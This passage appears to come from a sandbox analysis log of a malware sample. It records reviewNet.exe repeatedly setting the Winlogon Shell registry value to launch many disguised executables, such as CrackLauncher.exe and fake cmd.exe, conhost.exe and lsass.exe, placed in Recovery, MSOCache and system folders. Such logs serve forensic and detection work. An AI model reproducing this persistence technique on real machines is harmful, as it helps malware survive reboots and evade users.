\"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\", \"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\wscript.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Users\\Default User\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Users\\Admin\\Videos\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.fr\\audiodg.exe\", \"C:\\Windows\\AppPatch\\cmd.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\de-DE\\reviewNet.exe\", \"C:\\Windows\\Fonts\\CrackLauncher.exe\", \"C:\\Users\\Public\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\ComsurrogateServerdll\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\wscript.exe\", \"C:\\Users\\Admin\\Pictures\\CrackLauncher.exe\", \"C:\\Users\\Public\\Documents\\My Pictures\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\cmd.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\wscript.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\conhost.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\reviewNet.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\wscript.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\conhost.exe\", \"C:\\Users\\Admin\\Desktop\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0044-0409-0000-0000000FF1CE}-C\\OSPPSVC.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\CrackLauncher.exe\", \"C:\\ComsurrogateServerdll\\CrackLauncher.exe\", \"C:\\Program Files (x86)\\Google\\Update\\Offline\\cmd.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\conhost.exe\", \"C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Transactions.Bridge\\3.0.0.0__b03f5f7f11d50a3a\\CrackLauncher.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\CrackLauncher.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\AtomicHunter.exe\", \"C:\\Program Files\\Internet Explorer\\ja-JP\\lsass.exe\", \"C:\\Users\\Admin\\wininit.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\reviewNet.exe\"" reviewNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\reviewNet.exe\", \"C:\\Users\\Public\\Desktop\\conhost.exe\", \"C:\\Program Files\\Uninstall Information\\cmd.exe\", \"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Resource\\Linguistics\\CrackLauncher.exe\", \"C:\\Recovery\\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\\conhost.exe\", \"C:\\MSOCache\\All 